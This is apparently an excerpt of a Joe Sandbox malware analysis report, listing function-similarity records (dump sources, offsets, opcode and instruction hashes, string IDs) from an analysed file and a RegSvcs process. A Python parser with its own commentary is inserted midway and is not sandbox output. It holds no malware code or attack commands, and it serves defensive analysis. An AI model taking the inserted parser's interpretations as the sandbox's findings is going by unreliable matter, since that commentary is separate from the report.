                                            • Instruction ID: 3f30f894d1a09a42fea17f426badaa1283af8b9139688d33ab0d975016df5956
                                            • Opcode Fuzzy Hash: 997cbba34c2172f440f2bdb42e3549dfa83ac6942f8f039079a70598852752de
                                            • Instruction Fuzzy Hash: BCC0123680000ADFCB069F80C804AC1F7A1BF29700F0280E1DE080F022D231A938AB82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fac49bd18bdd90c12cdf4f5c30b55f478066477870b896fa9dc23e1eed16272b
                                            • Instruction ID: 7fda6fe0439219fcf1e83fef007aa868d25ddf63c41e4a117c6b76f2af0a0836
                                            • Opcode Fuzzy Hash: fac49bd18bdd90c12cdf4f5c30b55f478066477870b896fa9dc23e1eed16272b
                                            • Instruction Fuzzy Hash: 98C0023B044108EFCB025F81E908C95BFAAEB48320705C491F6494A033D772D974EB51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3df434a3a2aa800867b9d00e9b318fbd8b0d624f21cae1082ffcdfdde576fa50
                                            • Instruction ID: 1abf9f3b3a2db459bb79da041f409e83873d8fe333312de381b5d26e56306c48
                                            • Opcode Fuzzy Hash: 3df434a3a2aa800867b9d00e9b318fbd8b0d624f21cae1082ffcdfdde576fa50
                                            • Instruction Fuzzy Hash: 00C08C32000208BBCB027E80CD05E49BF2ABB043A0F148008F7040D021D373E923EBC1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                            • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                            • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                            • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
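The function-similarity records above all follow one layout: a "Memory Dump Source" header, a Source File line naming the dump and its Offset, then bullet fields (API ID, String ID, API String ID, Opcode ID, Instruction ID, the two fuzzy hashes). The parser below is an added example for working with that layout offline, not Joe Sandbox code; its input is constructed from three records copied from this page (two plain ones and one with a Strings header). It only applies exact string equality to the IDs and hashes and makes no assumption about what partial fuzzy-hash matches mean; the single cross-check it performs is observable on the page itself: the fourth dotted field of the dump name equals the Offset value in every record.

```python
import re
from collections import Counter, defaultdict

# Constructed input: three "Memory Dump Source" records copied in the shape
# they have in this report, so the parser can be run against the page's own
# layout without the report file itself.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39afee00091ec0c2cd2ed441153b69967dc8f7d6f385f2505fab9687bff28a34
• Instruction ID: f19e5ad01e07a6e2da8ae996334db89abbecd4ca08e11db28a5017a8f4c9b275
• Opcode Fuzzy Hash: 39afee00091ec0c2cd2ed441153b69967dc8f7d6f385f2505fab9687bff28a34
• Instruction Fuzzy Hash: C101DC31A106188FCB11EB69E8868DEBBB4EF86310710416BD546AB221DA309D46CFA2
Memory Dump Source
• Source File: 00000000.00000002.2184925018.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e7d000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1665799fa0827984c28d73d9a544cbd2999b459a01aedb047b30e07eb2db63a1
• Instruction ID: 3c6e39cc5b5f3d13445879fe1ed84bb30b70ed55dd527fd9335f189926e434aa
• Opcode Fuzzy Hash: 1665799fa0827984c28d73d9a544cbd2999b459a01aedb047b30e07eb2db63a1
• Instruction Fuzzy Hash: E6F062724093449AEB158E19DD88B66FFA8EF91734F18C45AFD0C5A286C2799C44CAB1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28e0000_file.jbxd
Similarity
• API ID:
• String ID: DN$DN$f%$pR
• API String ID: 0-2140127501
• Opcode ID: 610ff34f706438147d25ab675045aa402a0cbcdb09b05d3c64c78980d5269928
• Instruction ID: b00a58981caf15147c6313ae1c846cd08bfe83beef4a1eaa71a7b621ee0777a8
• Opcode Fuzzy Hash: 610ff34f706438147d25ab675045aa402a0cbcdb09b05d3c64c78980d5269928
• Instruction Fuzzy Hash: 58B12C74E1121A8FCB44DFA8D880A9DBBB2FF89300F509669E419BB355DB30AD45CF90
"""

_KV = re.compile(r"^•\s*([^:]+):\s*(.*)$")          # "• Key: value" (value may be empty)
_SRC = re.compile(
    r"^(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)


def parse_records(text):
    """One dict per 'Memory Dump Source' record. Bullet lines become key/value
    pairs; the Source File line is split into dump name, integer offset and
    the based-on-PE flag. Unbulleted lines (Joe Sandbox IDA Plugin,
    Similarity, Strings) carry no values and are skipped."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = _KV.match(line) if current is not None else None
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key != "Source File":
            current[key] = value
            continue
        s = _SRC.match(value)
        if s is None:
            raise ValueError(f"unrecognised Source File line: {value!r}")
        current["dump"] = s["dump"]
        current["offset"] = int(s["offset"], 16)
        current["based_on_pe"] = s["pe"] == "true"
        # Cross-check seen on every record of this page: the fourth dotted
        # field of the dump name is the same address as the Offset value.
        if int(s["dump"].split(".")[3], 16) != current["offset"]:
            raise ValueError(f"dump name and Offset disagree: {value!r}")
    return records


def index_by(records, field):
    """Map each distinct non-empty value of `field` (e.g. 'Instruction Fuzzy
    Hash') to the region offsets whose records carry it. Exact equality only."""
    idx = defaultdict(list)
    for r in records:
        if r.get(field):
            idx[r[field]].append(r["offset"])
    return dict(idx)


def regions(records):
    """Number of records per memory region offset."""
    return Counter(r["offset"] for r in records)


def opcode_id_is_fuzzy_hash(record):
    """True when Opcode ID and Opcode Fuzzy Hash are the same string, as they
    are in every record on this page."""
    return record.get("Opcode ID") == record.get("Opcode Fuzzy Hash")
```

Feeding the whole report text to `parse_records` gives one dict per function record; `regions` shows how many records come from each dumped region (on this page almost all from the 0A0A0000 region, which is unpacked code rather than the on-disk image, since every record says "based on PE: false"), and `index_by` on "Opcode ID" or "Instruction Fuzzy Hash" is the lookup to pivot from this report to another one carrying the same value.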
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DN$DN$f%$pR
                                            • API String ID: 0-2140127501
                                            • Opcode ID: 610ff34f706438147d25ab675045aa402a0cbcdb09b05d3c64c78980d5269928
                                            • Instruction ID: b00a58981caf15147c6313ae1c846cd08bfe83beef4a1eaa71a7b621ee0777a8
                                            • Opcode Fuzzy Hash: 610ff34f706438147d25ab675045aa402a0cbcdb09b05d3c64c78980d5269928
                                            • Instruction Fuzzy Hash: 58B12C74E1121A8FCB44DFA8D880A9DBBB2FF89300F509669E419BB355DB30AD45CF90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $>&$$>&$*,
                                            • API String ID: 0-2034636958
                                            • Opcode ID: ac23f234ef08572a0b34ce88cc49d834f4b04117ef64698f417a3586872dc9c5
                                            • Instruction ID: 8e2d54421500daef98c3d1a09c377be2e96553ebcb92ea346735fb12bc9abd61
                                            • Opcode Fuzzy Hash: ac23f234ef08572a0b34ce88cc49d834f4b04117ef64698f417a3586872dc9c5
                                            • Instruction Fuzzy Hash: 58715978E052099FCF04CFA9D4809AEFBB5FF8A350F10951AD916E7264D330AA41CF90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: sDn$sDn$!ZN
                                            • API String ID: 0-3500289043
                                            • Opcode ID: 21f212b2d0ca4d3c71cd5f4a8237af3084f3bdfba5f78f9bc7c3065868b7f0b2
                                            • Instruction ID: ca2f9468cf0ad7f03dbda182ac861c748d837264e59ff6a8e4df795a24922aed
                                            • Opcode Fuzzy Hash: 21f212b2d0ca4d3c71cd5f4a8237af3084f3bdfba5f78f9bc7c3065868b7f0b2
                                            • Instruction Fuzzy Hash: 1661D178E052099FCF08CFAAD5809DEFBF2EF89218F64942AD415F7254D3389A41CB64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #@|$#@|
                                            • API String ID: 0-2807140629
                                            • Opcode ID: ff005fdf58ececd16b61bee9a99a0e4d44f842fd3717e063a89fe3aa57bd233c
                                            • Instruction ID: 189ffde2deecd9aa45c319c6f55d511d0af251567d66ad75c996cd624edb429d
                                            • Opcode Fuzzy Hash: ff005fdf58ececd16b61bee9a99a0e4d44f842fd3717e063a89fe3aa57bd233c
                                            • Instruction Fuzzy Hash: 9071E5B8D0520ADFCF04CF99D5809AEFBB2BF49314F54951AE416A7311D338A982CF95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: sDn$!ZN
                                            • API String ID: 0-4274154149
                                            • Opcode ID: f32f2ac86830efc951180703dc8ee23ad6b0d8cf4cd7f600aa077213a6ad6817
                                            • Instruction ID: e729f575d7db60f70d9b91f0682a088f50e87242f80b316d9039728791020430
                                            • Opcode Fuzzy Hash: f32f2ac86830efc951180703dc8ee23ad6b0d8cf4cd7f600aa077213a6ad6817
                                            • Instruction Fuzzy Hash: 7761F278E052098FCF08CFA9D5809DEFBF2EF89219F24942AD415F7264D3349A41CB64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,fK,$,fK,
                                            • API String ID: 0-293665814
                                            • Opcode ID: cfc9fe91505262c013939e5d3586c59593409a10a793cdc2a05f501ac51a4e6a
                                            • Instruction ID: 1d8142ea0cd567c47a096b42e390f9f94665f285c88dbc1908d77601f3bb588b
                                            • Opcode Fuzzy Hash: cfc9fe91505262c013939e5d3586c59593409a10a793cdc2a05f501ac51a4e6a
                                            • Instruction Fuzzy Hash: 6E6107B8D042099FCF04CFA9C5805AEFBB2BF4A308F58941AD426B7250D7789641CFA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: k9[W
                                            • API String ID: 0-1251553737
                                            • Opcode ID: 542bf8cab9de522b4b59edd2fcc399745fda28919f7e7bcfc8b4cc928630a34b
                                            • Instruction ID: 7a05134123c065f9323986bac62b5da9e3e7f4cf44639dfe74aafcadce69f388
                                            • Opcode Fuzzy Hash: 542bf8cab9de522b4b59edd2fcc399745fda28919f7e7bcfc8b4cc928630a34b
                                            • Instruction Fuzzy Hash: 4F71BD78E11209DFCB48CF99D48499EFBF1FF89210F14856AE92AEB225D734A941CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #@|
                                            • API String ID: 0-3097398237
                                            • Opcode ID: 71f6952c9f952d13d6c657449f33dd218acc1bfa2db3b97976bc506dd21ba8da
                                            • Instruction ID: c0b825c5ad6717034956d77524c96ad802eb020431ecdceebc56b32af1c8ce77
                                            • Opcode Fuzzy Hash: 71f6952c9f952d13d6c657449f33dd218acc1bfa2db3b97976bc506dd21ba8da
                                            • Instruction Fuzzy Hash: C761E678E0520ACFCB04CF99D5809AEFBB2BF49314F549516D416A7311D338AA82CF95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: k9[W
                                            • API String ID: 0-1251553737
                                            • Opcode ID: 660e135ab2f350b25be66eb666847794f5a74a2dbc0b2a9e743a7c144a8d1d25
                                            • Instruction ID: 4d4c23cb46117e11a829e40a7541181bc524d31b9057e2fbf1376e9131846cbe
                                            • Opcode Fuzzy Hash: 660e135ab2f350b25be66eb666847794f5a74a2dbc0b2a9e743a7c144a8d1d25
                                            • Instruction Fuzzy Hash: 6F71CF78E052099FCB48CFA9D48499EFBF1FF89210F14C56AE42AEB265D734A941CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WB69
                                            • API String ID: 0-3533285588
                                            • Opcode ID: 3ca190f15800ff028d0f0206cc93e511c9fa23a7e43c52324b7c66062c8d8854
                                            • Instruction ID: 7ec332b5dc8642f696d363c12c30f6d6e16e64e33186759903018c51c5a19a97
                                            • Opcode Fuzzy Hash: 3ca190f15800ff028d0f0206cc93e511c9fa23a7e43c52324b7c66062c8d8854
                                            • Instruction Fuzzy Hash: 165108B8E1520E9BCF04CFA9C5815AEFBB2EF89304F64D469C416F7214E7389A41CB95
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WB69
                                            • API String ID: 0-3533285588
                                            • Opcode ID: 471779a789641805a2747238390254495a5d56d0631dae7ae65437ed81d7c5e6
                                            • Instruction ID: a68f0a8a2875c89cf2e6ef0643d98bc0fed3f502598c18dbd39fe48c0801fb27
                                            • Opcode Fuzzy Hash: 471779a789641805a2747238390254495a5d56d0631dae7ae65437ed81d7c5e6
                                            • Instruction Fuzzy Hash: 85513CB8E1520E8FCF04CFA9C5814AEFBB2EF89314F24D56AC416E7254E7349A41CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |smp
                                            • API String ID: 0-3595334375
                                            • Opcode ID: f721f32b25198a3e74c7e88f9492f82bdefb0e96ae28e73a0187a4de0e84e787
                                            • Instruction ID: a0470626477f4b70726408fffa3fff8998b3a7a332aaf53d22b6590df76e897d
                                            • Opcode Fuzzy Hash: f721f32b25198a3e74c7e88f9492f82bdefb0e96ae28e73a0187a4de0e84e787
                                            • Instruction Fuzzy Hash: CC21B3B1E016189BEB18CF9BD8547DEFBF7AFC9310F14C16AD518AA254EBB409458F80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |smp
                                            • API String ID: 0-3595334375
                                            • Opcode ID: 774a9253173d695536d5ff685e4eca43b6f380a701b6c261555ed6dd0b1cff29
                                            • Instruction ID: 239ba15d04b27f352a80b14170bbe42b95c609ebc907534eb284730fca71212a
                                            • Opcode Fuzzy Hash: 774a9253173d695536d5ff685e4eca43b6f380a701b6c261555ed6dd0b1cff29
                                            • Instruction Fuzzy Hash: D421B7B1E016589BEB58CFABD85439EBBF3AFC9300F14C16AD458AB254DBB809458F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d04b87782a6dd48a1f52714d1e54f6c33ccb9c25c131bf69986f56f0cce2431
                                            • Instruction ID: 59bfe8e1fb64a64fb9567bf9f7701a918de4c1f404583d7577c7dc6d7c269906
                                            • Opcode Fuzzy Hash: 2d04b87782a6dd48a1f52714d1e54f6c33ccb9c25c131bf69986f56f0cce2431
                                            • Instruction Fuzzy Hash: 8012F3F1D99741ABE310CF26E9882A83BA1F7C4318FD74A18C2655B2E4D7F9146ACF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 719518a5103dba52985419a8734a00b30c023a077a4e604bbe7411cc0fa8e044
                                            • Instruction ID: 64a041f2a18731a59b2babb5b6315e6a27c6f942e5567c3c13aa1dbc22368132
                                            • Opcode Fuzzy Hash: 719518a5103dba52985419a8734a00b30c023a077a4e604bbe7411cc0fa8e044
                                            • Instruction Fuzzy Hash: 12E11874E041198FDB14DFA8C5809AEBBF2FF88304F24826AE804AB315DB35AD45CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6bba60b9d44e60e8272e407dd275b7a8ade4a5f7556b5effd45d73983447ad5
                                            • Instruction ID: 875c8cb21e00971ae52963da0684c80bb6a4ef982d09fb6e6151200e66a32a17
                                            • Opcode Fuzzy Hash: d6bba60b9d44e60e8272e407dd275b7a8ade4a5f7556b5effd45d73983447ad5
                                            • Instruction Fuzzy Hash: 40E1E874E0411A9FDB14DFA9C5809AEBBB2FF88304F248269D814AB355DB35A941CFA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e3a1ee9749fe0a27fa6999586f8bf90bca7a599e9ad6aff50f0f6e7e80c6f82
                                            • Instruction ID: 76fcae066e717a77554bdcdcfb52977ebf0ad6cc8a0be6de01632aaf1a422149
                                            • Opcode Fuzzy Hash: 5e3a1ee9749fe0a27fa6999586f8bf90bca7a599e9ad6aff50f0f6e7e80c6f82
                                            • Instruction Fuzzy Hash: 5EE1E774E041198FDB14DFA9C5809AEFBB2FF89304F248269E814AB355DB35AD41CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cdbd9307f3df9de6d401ccb16f99e1ad8347c37135ae39092d54f2b959351183
                                            • Instruction ID: 046e8e439a146681c4fdb9331c0d068974c1515649fce78629a03be9e0efcec0
                                            • Opcode Fuzzy Hash: cdbd9307f3df9de6d401ccb16f99e1ad8347c37135ae39092d54f2b959351183
                                            • Instruction Fuzzy Hash: EFE1F874E0011A8FDB14DFA8C5809AEBBB2FF89304F24C269E814AB355DB35AD45CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd4e9514ab831fa6a24e819aee1194676d5833234251a43e444c2539479bb99e
                                            • Instruction ID: 5eebe10b5f359e7965123600ac994535525cf6ddcfb29058e3e694ab9752f996
                                            • Opcode Fuzzy Hash: bd4e9514ab831fa6a24e819aee1194676d5833234251a43e444c2539479bb99e
                                            • Instruction Fuzzy Hash: 4CE1F874E002198FDB14DFA9C5849AEBBF2FF89304F248269D814AB355DB35AD41CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a7f7993a08177691634e94502029c613b04aa1297262138f49e888989ac510e
                                            • Instruction ID: 9dc3ed25ccb3cbc996ca55f277c08e61289e4bde071a5e3efdebcbbb1b9d90d7
                                            • Opcode Fuzzy Hash: 1a7f7993a08177691634e94502029c613b04aa1297262138f49e888989ac510e
                                            • Instruction Fuzzy Hash: 90D13830E14B1ADACB11EB68D9546DDB7B1FF99300F60D79AE40937221EB706AC5CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44d41f771d705de6ff15319e72fb4c485e088c61708ba5a31bbbdc87ab051c01
                                            • Instruction ID: 12ce5e3e521cbad355ba4f68f7acc6049244881e85431ec7aafabea053a34b81
                                            • Opcode Fuzzy Hash: 44d41f771d705de6ff15319e72fb4c485e088c61708ba5a31bbbdc87ab051c01
                                            • Instruction Fuzzy Hash: C9A17B72E003098FDF09DFA9C8545AEB7B6FF85300B15856AE806AB221DB31E915CF80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2545776e106c417294718b69c894c174915888ada5f839721dcf9ad91a06f20
                                            • Instruction ID: fd31484327d14e620d67525b3eb9a8a7dec0b38294afff054e5fc8623b0da77c
                                            • Opcode Fuzzy Hash: f2545776e106c417294718b69c894c174915888ada5f839721dcf9ad91a06f20
                                            • Instruction Fuzzy Hash: E7D11830E14B1A9ACB11EB68D9546DDB7B1FF99300F60D79AE40937221EB706AC5CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1548ade3d77717c29c8fccc3857e9c6236455e2c33d69bc76583b03ea2f03397
                                            • Instruction ID: 739cfcaad9200d5a60581ec1f87992e37690d33bded761d2dffd31c4ade32102
                                            • Opcode Fuzzy Hash: 1548ade3d77717c29c8fccc3857e9c6236455e2c33d69bc76583b03ea2f03397
                                            • Instruction Fuzzy Hash: 84C167B1C987459BD310CF26E9882A93BB1FBC5324FD34B19D1616B2E4D7B4146ACF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3188e8d35d48ab82487c730460f8c163f99f97cdbdd720cfd190e4f686038cf3
                                            • Instruction ID: c5018137170c04fe66c5a4004fe052c577196a2ec4c435ab75105ece15725819
                                            • Opcode Fuzzy Hash: 3188e8d35d48ab82487c730460f8c163f99f97cdbdd720cfd190e4f686038cf3
                                            • Instruction Fuzzy Hash: 08616F70E042198FDB19DF69D5445AEBBF2FF89300F24816AD408EB265DB349D45CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac9bebe5ab0db5fe9b7ffa7d58af30c6b0b6cf7abcc18a8c85e1356600fb6353
                                            • Instruction ID: 5b13342a6c43372f266adc0669f03b937845a5a2cf030497bdfe810fd6f47b5f
                                            • Opcode Fuzzy Hash: ac9bebe5ab0db5fe9b7ffa7d58af30c6b0b6cf7abcc18a8c85e1356600fb6353
                                            • Instruction Fuzzy Hash: 1C71A078E052558FDB14CF69C980AAEFBF2FF89304F24C1A9D449A7265DB305941CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • API String ID: 0-2533611571
                                            • Opcode ID: 6f7154e7210866b11a3126cbbb034aa9db522840529ca1ae4ca30cca12bb2576
                                            • Instruction ID: b626e53557fd1a71a7b595013c4d0cfbea6bf603af459031acfc2c17b2d41e90
                                            • Opcode Fuzzy Hash: 6f7154e7210866b11a3126cbbb034aa9db522840529ca1ae4ca30cca12bb2576
                                            • Instruction Fuzzy Hash: D3817E35A005058FEF1ADF69C88896AF7F7BF8E210B19816AD405FB365D731E841CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xgq$Xgq
                                            • API String ID: 0-2113765878
                                            • Opcode ID: 134f8c13c7337899d88b4cb66ecb753c0486a07e65a06e5fdb5f36db7b2287f1
                                            • Instruction ID: 6d1c3b326450819391426ab23d4790451d8086affd5c39a463387ac99f54cee5
                                            • Opcode Fuzzy Hash: 134f8c13c7337899d88b4cb66ecb753c0486a07e65a06e5fdb5f36db7b2287f1
